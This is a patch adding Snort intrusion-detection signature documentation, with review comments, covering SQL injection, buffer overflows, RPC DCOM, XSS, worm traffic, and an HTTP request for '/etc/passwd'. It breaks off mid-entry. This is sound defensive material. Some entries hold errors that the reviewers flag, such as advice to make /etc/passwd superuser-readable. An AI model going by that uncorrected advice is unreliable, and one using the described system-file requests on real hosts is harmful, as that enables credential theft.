+Additional References:
+Microsoft Technet
+http://support.microsoft.com/support/kb/articles/q153/1/83.asp
+CVE
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0562
+Winreg
+http://www.rutherfurd.net/python/winreg/
+
+--
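Review bot: Impact is given as "Unknown." while Attack Scenarios states the attacker may "bind to the service to manipulate host settings"; the two should agree, e.g. Impact: "Information gathering; possible remote reading or modification of the Windows registry." "False Positives: None known." is also unlikely for this rule, because binding to the winreg interface is exactly what legitimate remote registry administration does; the section should say that events from trusted administrative hosts are expected and that the rule is most useful on traffic from external networks, which is what the Corrective Action already implies.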
--- /dev/null
+++ b/doc/signatures/100000767.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000767
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection vulnerability in the "Blog CMS" application running on a webserver. Access to the file "index.php" with SQL commands being passed as the "item" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a remote machine via the "item" parameter in the "index.php" script used by the "Blog CMS" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to compromise the database backend for the application, the attacker may also be able to execute system binaries or malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Blog CMS
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application if user input is not correctly sanitized or checked before passing that input to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
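Review bot: the third Detailed Information paragraph ("Some applications do not perform stringent checks when validating the credentials of a client host...") is credential-checking boilerplate that does not describe SQL injection via the "item" parameter; replace it with what the rule matches in the query string, or drop it. The Impact's "Possible execution of arbitrary code" should be qualified: for SQL injection it depends on the privileges of the database account the application uses. Typo: "running ona web server" should be "running on a web server".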
--- /dev/null
+++ b/doc/signatures/1975.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1976
+
+--
+Summary:
+This event is generated when an attempt is made to supply an excessively
+long argument to an FTP command possibly in an attempt to exploit a buffer
+overflow vulnerability associated with CesarFTPD FTP server DELE command.
+
+--
+Impact:
+Remote access.  A successful attack may permit the remote execution of
+arbitrary commands with system privileges.
+
+--
+Detailed Information:
+CesarFTPD offers FTP servers for Windows hosts. A vulnerability exists
+with the DELE command that can cause a buffer overflow and permit the
+execution of arbitrary commands with system privileges. The buffer
+overflow can be caused by supplying an overly long argument to the DELE
+command.
+
+Likewise, ArGoSoft FTP Server 1.4.2.8 suffers from a buffer overflow
+condition that can be exploited by supplying excess data as a parameter
+to the DELE command.
+
+--
+Affected Systems:
+	CesarFTP 0.98b
+	ArGoSoft FTP Server 1.4.2.8
+
+--
+Attack Scenarios:
+An attacker can supply an overly long file argument with the DELE
+command, causing a buffer overflow.
+
+--
+Ease of Attack:
+Simple.  
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com> 
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/12755
+
+--
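Review bot: the file is named 1975.txt but the Sid field reads "1976"; one of the two is wrong, and the documentation will not be found for the rule it describes. The Summary names only the CesarFTPD DELE overflow while Detailed Information and Affected Systems add ArGoSoft FTP Server 1.4.2.8; either mention both products in the Summary or give the ArGoSoft issue its own SID documentation, and confirm that the single Bugtraq reference (bid/12755) covers the product the rule is actually for.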
--- /dev/null
+++ b/doc/signatures/1132.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1132
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
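Review bot: this documentation never says what rule 1132 actually matches; Summary, Detailed Information and Attack Scenarios are generic ("the attack scenarios are legion") and Additional References is empty, so an analyst cannot tell a true positive from noise. State the URI or request pattern the rule looks for and the product it applies to, and link the advisory for that issue; until then "False Positives: None known." cannot be evaluated.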
--- /dev/null
+++ b/doc/signatures/726.txt
@@ -0,0 +1,91 @@
+Rule:
+
+--
+Sid:
+726
+
+
+--
+Summary:
+This event is generated when worm activity is detected. More specifcally
+this event indicates possible "My Romeo" propogation.
+
+--
+Impact:
+Serious. The victim host may be infected with a worm.
+
+--
+Detailed Information:
+This worm propogates via electronic mail and exploits a known
+vulnerability in the way that versions of Microsoft Outlook and Internet
+Explorer handle trusted HTML pages. The worm is launched via a compiled
+HTML file (.chm) which is used by Microsoft WIndows Help.
+
+The executable part of the worm is called from within the trusted
+compiled HTML file. The worm attempts to propagate using hard coded
+addresses of SMTP servers.
+
+This worm is also Known As: Romeo and Juliet, W32/Verona, TrojBlebla.A
+
+--
+Affected Systems:
+	Microsoft Windows 9x
+	Microsoft Windows 2000
+
+--
+Attack Scenarios:
+Symantec Anti-Virus center states that the worm arrives as an email
+message that has an HTML body and two attachments named Myjuliet.chm
+and Myromeo.exe. The subject of the email is selected at random from
+the following set:
+
+Romeo&Juliet
+hello world
+subject
+ble bla, bee
+I Love You ;)
+sorry...
+Hey you !
+Matrix has you...
+my picture
+from shake-beer
+
+--
+Ease of Attack:
+Simple. This is worm activity.
+
+--
+False Positives:
+Legitimate electronic mail containing the known subject lines used by
+MyRomeo may cause this rule to generate an event.
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches and service packs.
+
+Use Anti-Virus software to detect and delete virus laden email.
+
+This worm makes changes to the system registry, removal of the affected
+registry keys should be done using an appropriate virus removal tool or
+by an experienced Windows administrator.
+
+--
+Contributors:
+Original Rule Writer Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+McAfee
+http://vil.nai.com/vil/content/v_98894.htm
+
+Symantec Security Response
+http://securityresponse.symantec.com/avcenter/venc/data/w32.blebla.worm.html
+
+--
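Review bot: typos in this file: "specifcally" and "propogation" in the Summary, "propogates" in Detailed Information, and "WIndows" in "Microsoft WIndows Help". The worm is called "My Romeo" in the Summary and "MyRomeo" in False Positives; use one spelling. The False Positives section implies the rule matches on the mail subject lines (e.g. "hello world", "my picture") rather than on the attachments; say so plainly in the Summary, since that is what an analyst needs to judge an alert.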
--- /dev/null
+++ b/doc/signatures/2928.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+2928
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft Network Dynamic Data Exchange (NetDDE)
+services.
+
+--
+Impact:
+Serious. Execution of arbitrary code with system level privileges
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft NetDDE that may allow an attacker to
+run code of their choosing with system level privileges. A programming
+error in the handling of network messages may give an attacker the
+opportunity to overflow a fixed length buffer by using a specially
+crafted NetDDE message.
+
+This service is not started by default on Microsoft Windows systems, but
+this issue can also be exploited locally in an attempt to escalate
+privileges after a successful attack from an alternate vector.
+
+--
+Affected Systems:
+	Microsoft Windows NT, 2000, 2003, XP, 98 and ME systems.
+
+--
+Attack Scenarios:
+An attacker needs to craft a special NetDDE message in order to overflow
+the affected buffer.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Disable the NetDDE service.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft Security Bulletin MS04-031:
+http://www.microsoft.com/technet/security/bulletin/ms04-031.mspx
+
+--
--- /dev/null
+++ b/doc/signatures/115-3.txt
@@ -0,0 +1,69 @@
+
+
+Rule:
+
+--
+Sid:
+115-3
+
+--
+Summary:
+This event is generated when the pre-processor asn1 detects network
+traffic that may constitute an attack. Specifically an asn.1 oversized
+item, indicating a possible overflow attempt was detected.
+
+--
+Impact:
+Unknown.
+
+--
+Detailed Information:
+This event is generated when the asn1 pre-processor detects network
+traffic that may consititute an attack.
+
+This may indicate an attempt to overflow a fixed length buffer in an
+application using the asn1 libraries.
+
+More information on this event can be found in the individual
+pre-processor documentation README.asn1 in the docs directory of the
+snort source. Detailed instructions and examples on how to tune and use
+the pre-processor can also be found in the same document.
+
+--
+Affected Systems:
+	All.
+
+--
+Attack Scenarios:
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Daniel Roelker <droelker@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+ASN1 Information Site:
+http://asn1.elibel.tm.fr/
+
+--
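Review bot: the Attack Scenarios section is empty, yet Ease of Attack says "Simple."; fill in the scenario (an ASN.1 item whose encoded length exceeds what the receiving decoder expects, sent to any service that parses BER/DER, such as SNMP, LDAP or Kerberos) or drop the Ease of Attack claim. Typo: "consititute" in Detailed Information. Since the text already refers the reader to README.asn1 for tuning, the Corrective Action could note that the oversized-item threshold itself is a preprocessor setting and a source of tuning-related false positives.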
--- /dev/null
+++ b/doc/signatures/3267.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3267
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
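Review bot: Attack Scenarios ("An attacker may make a request for a file with an overly long filename via a network share.") does not connect to the Detailed Information, which describes a malformed DCOM request over RPC; as written it reads like an SMB attack. Say that the overly long path is carried inside the DCOM activation request sent over RPC, which is what the rule inspects. Additional References is empty; the Microsoft bulletin for the RPC DCOM overflow (MS03-026) should be linked. Typo: "Expoit code exists."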
--- /dev/null
+++ b/doc/signatures/3204.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3204
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
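Review bot: this file is identical to 3267.txt apart from the Sid line, so nothing tells an analyst what distinguishes rule 3204 from rule 3267 (a different transport, port, or variant of the request). Add the distinguishing detail to the Summary or Detailed Information of each file, and fix the shared "Expoit" typo in Ease of Attack here as well.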
--- /dev/null
+++ b/doc/signatures/1030.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid:
+1030
+
+--
+Summary:
+This event is generated when an attempt is made to access the search97.vts file.
+
+--
+Impact:
+Intelligence gathering, remote execution of files, denial of service.  This attack can permit the viewing and execution of files on the vulnerable server.  Additionally, a denial of service attack exists, allowing a remote user to shut down the Verity software. 
+
+--
+Detailed Information:
+The Verity/Search'97 software provides a search engine.  A vulnerability exists with a CGI script associated with Verity software because of improper input checking.  This may permit an attacker to access and execute files as well as shut down the Verity software.
+
+--
+Affected Systems:
+Verity Search97 2.1
+
+--
+Attack Scenarios:
+An attacker can craft a URL to access the vulnerable search97.vts file to remotely read or execute files, or cause a denial of service.
+
+--
+Ease of Attack:
+Simple.  
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Apply the appropriate patch.
+
+--
+Contributors:
+Original rule writer unknown
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/162
+
+
+--
--- /dev/null
+++ b/doc/signatures/1464.txt
@@ -0,0 +1,72 @@
+Rule:
+
+--
+Sid:
+1464
+
+--
+Summary:
+This event is generated when a known response to a sucessful attack is
+detected.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when a known response to a sucessful attack is
+detected. Some applications do not perform stringent checks when validating
+the credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can be
+compromised and trust relationships between the victim server and other
+hosts can be exploited by the attacker.
+
+Events generated by rules in attack-responses.rules may indicate that an
+attack against a host has been sucessful.
+
+--
+Affected Systems:
+	Any vulnerable host.
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. An attacker might also exploit a
+weakness in a particular application or piece of software that will
+present the opportunity to gain access to the host.
+
+--
+Ease of Attack:
+Simple. Many exploits exist for various systems and software.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Care should be taken to investigate the source of the event. Check for
+signs of system compromise in log files. Check for listening services on
+high ports.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
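Review bot: "sucessful" is misspelled three times (Summary and twice in Detailed Information). More importantly, the text never states which response string the rule matches, so the reader cannot judge "False Positives: None known."; attack-responses rules fire on server output, so the same string appearing in legitimate content will trigger the rule, and the False Positives section should say so. The Corrective Action is the right one for this event class: treat the host as potentially compromised and investigate before patching.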
--- /dev/null
+++ b/doc/signatures/111-1.txt
@@ -0,0 +1,63 @@
+Rule: 
+
+--
+Sid: 
+111-1
+
+-- 
+Summary: 
+This event is generated when the pre-processor stream4
+detects network traffic that may constitute an attack.
+
+-- 
+Impact: 
+This may indicate scanning activity.
+
+--
+Detailed Information:
+The pre-processor stream4 has detected network traffic that may indicate
+a network scan is in progress. That is, a TCP datastream has been
+detected that does not conform to normal activity.
+
+An attacker may be able to determine the characteristics of a remote
+system by sending abnormal network data. The response can reveal the
+operating system type, indicate the presence of a firewall or show open
+and closed ports on the host.
+
+--
+Affected Systems:
+	All systems
+
+--
+Attack Scenarios: 
+An attacker may utilize scanning techniques to determine possible points
+of exploitation against a host.
+
+-- 
+Ease of Attack: 
+Simple. Many scanning tools exist.
+
+-- 
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+Corrective Action:
+Check the target host for signs of compromise.
+
+Ensure the system is up to date with any appropriate vendor supplied patches.
+
+--
+Contributors:
+Martin Roesch <roesch@sourcefire.com>
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
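Review bot: the Summary and Detailed Information only say that stream4 saw a "TCP datastream ... that does not conform to normal activity"; the file should name which stream4 condition generator 111, event 1 corresponds to so the analyst can tune it. "False Positives: None Known." is doubtful for a stream-reassembly event: asymmetric routing, packet loss seen on only one side of the sensor, and non-standard TCP stacks all produce streams that do not conform, and the section should say so rather than claiming none.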
--- /dev/null
+++ b/doc/signatures/1122.txt
@@ -0,0 +1,66 @@
+Rule:
+
+Sid:
+--
+1122
+
+Summary:
+--
+This event is generated when an attempt is made to retrieve a protected
+system file on a host via a web request.
+
+--
+Impact:
+Information Gathering.
+
+--
+Detailed Information:
+The passwd file usually found in the /etc/ directory on UNIX based
+systems, contains login information for users of a host. If shadow
+password files are not being used, an attacker could obtain valid login
+information for the system by using widely available password cracking
+tools on the file.
+
+The file may also be used to garner information that may be used in
+brute force password guessing attacks against the host.
+
+--
+Affected Systems:
+	All UNIX based systems running a Web Server.
+ 
+--
+Attack Scenarios:
+The attacker can make a standard HTTP request that contains 
+'/etc/passwd'in the URI.
+
+--
+Ease of Attack:
+Simple HTTP request.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Webservers should not be allowed to view or execute files and binaries 
+outside of it's designated web root or cgi-bin. This file may also be 
+requested on a command line should the attacker gain access to the 
+machine. Making the file read only by the superuser on the system will 
+disallow viewing of the file by other users.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
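Review bot: the "--" separators at the top of this file are placed after the "Sid:" and "Summary:" headers instead of before them, unlike every other file in the patch, so the section layout breaks for any tool that splits on the separator. Typos: "'/etc/passwd'in the URI" needs a space, and "outside of it's designated web root" should be "its". The Corrective Action advice to make /etc/passwd "read only by the superuser" is wrong: the file must stay world-readable for ordinary user-name and UID lookups to work; the correct advice is to keep hashes in the shadow file (as Detailed Information already notes) and to confine the web server so it cannot read outside its document root.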
--- /dev/null
+++ b/doc/signatures/1545.txt
@@ -0,0 +1,53 @@
+Rule:
+
+--
+Sid:
+1545
+
+--
+Summary:
+This event is generated when potential Denial of Service (DoS) traffic is detected on the network. 
+
+--
+Impact:
+Serious. A DoS attack may be underway.
+
+--
+Detailed Information:
+This event indicates that DoS traffic has been detected. An attempt to exhaust resources on a host may be underway leading to the host being unavailable for legitimate use.
+
+--
+Attack Scenarios:
+An attacker may attempt to exhaust resources available on a host leading to the host being unable to respond to legitimate requests.
+
+--
+Ease of Attack:
+Simple to Difficult.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Perform proper forensic analysis on the suspected compromised host to discover the means of compromise.
+
+Rebuild a confirmed compromised host.
+
+Use a packet-filtering firewall to block inappropriate traffic to the network to prevent hosts from being compromised.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
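Review bot: the Affected Systems section is missing; every other file in the patch carries one. The Corrective Action ("Perform proper forensic analysis on the suspected compromised host ... Rebuild a confirmed compromised host.") does not fit the event described, which is resource-exhaustion traffic rather than a compromise; it should instead cover filtering or rate limiting the offending traffic and checking that the targeted service is still available. The Summary also never says what the rule matches, so "Ease of Attack: Simple to Difficult." gives the reader nothing to work with.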
--- /dev/null
+++ b/doc/signatures/100000781.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000781
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site scripting vulnerability in the "Horde" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site scripting vulnerability via the "untrusted" parameter in the "go.php" script used by the "Horde" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to retrieve sensitive data, execute system binaries or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using Horde
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Dan Raswami <dan.raswami@sourcefire.com>
+
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
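Review bot: the Impact and the second Detailed Information paragraph claim server-side consequences (administrative access to the server, executing "system binaries") for a cross site scripting issue, but XSS runs script in the victim's browser, not on the web server; the realistic impact is theft of session cookies or credentials and actions performed in the user's context, which is what the Attack Scenarios line already describes. Reword Impact accordingly. The "untrusted" parameter of "go.php" named in Detailed Information should also appear in the Summary, as the other web-application entries in this patch do.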
--- /dev/null
+++ b/doc/signatures/100000325.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000325
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "ScozNet ScozNews" application running on a webserver. Access to the file "admin_cats.php" using a remote file being passed as the "main_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "main_path" parameter in the "admin_cats.php" script used by the "ScozNet ScozNews" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using ScozNet ScozNews
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
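Review bot: the third Detailed Information paragraph and the Attack Scenarios text ("An attacker can access an authentication mechanism and supply his/her own credentials...") are credential-checking boilerplate and do not describe remote file inclusion through "main_path"; the scenario is an attacker supplying the URL of a script under their control as that parameter so the server includes and executes it. Typo: "running ona web server". Additional References is empty; the advisory for this ScozNews issue should be linked.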
--- /dev/null
+++ b/doc/signatures/1097.txt
@@ -0,0 +1,72 @@
+Rule:
+
+--
+Sid:
+1097
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Talentsoft knowledge base:
+http://www.webplus.com/Issues/
+
+--
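Review bot: the body is entirely generic (no product, script or parameter is named), yet Additional References points at the Talentsoft knowledge base (http://www.webplus.com/Issues/), which implies the rule targets a specific Talentsoft product; name that product and the request the rule matches in the Summary so the reference makes sense. Typo: "running ona web server".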
--- /dev/null
+++ b/doc/signatures/2981.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+2981
+
+--
+Summary:
+This event is generated when an attempt is made to access the ADMIN$
+administrative share of a Windows host.
+
+--
+Impact:
+Serious. Possible administrator access to the host. Information 
+disclosure.
+
+--
+Detailed Information:
+By default, Windows hosts have default administrative shares of the 
+local hard drives using the format %DRIVE_LETTER% + $. Anybody with 
+administrative rights can remotely access the share.
+
+--
+Affected Systems:
+	Windows hosts.
+
+--
+Attack Scenarios:
+An attacker may be attempting to access files located on the C drive of 
+the host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow Netbios access from external networks (tcp port 139).
+
+--
+Contributors:
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Josh Sakofsky
+
+-- 
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS339
+
+Microsoft:
+http://support.microsoft.com/default.aspx?scid=kb;en-us;100517
+
+--
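Review bot: the sections disagree about which share is involved: the Summary says ADMIN$, Detailed Information describes the drive-letter shares ("%DRIVE_LETTER% + $"), and Attack Scenarios says the attacker is after "files located on the C drive", which would be C$. ADMIN$ maps to the Windows system directory, so either the Summary or the other two sections is wrong. The Corrective Action names only TCP port 139; SMB is also carried directly over TCP 445, which other files in this patch already list, so include it.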
--- /dev/null
+++ b/doc/signatures/428.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+
+Sid:
+428
+
+--
+
+Summary:
+This event is generated when a host generates and ICMP Parameter Problem datagram with an undefined ICMP Code.
+
+--
+
+Impact:
+ICMP datagrams should never contain undefined ICMP Codes.  This is normally an indication of nefarious activity occurring on the network.
+
+--
+
+Detailed Information:
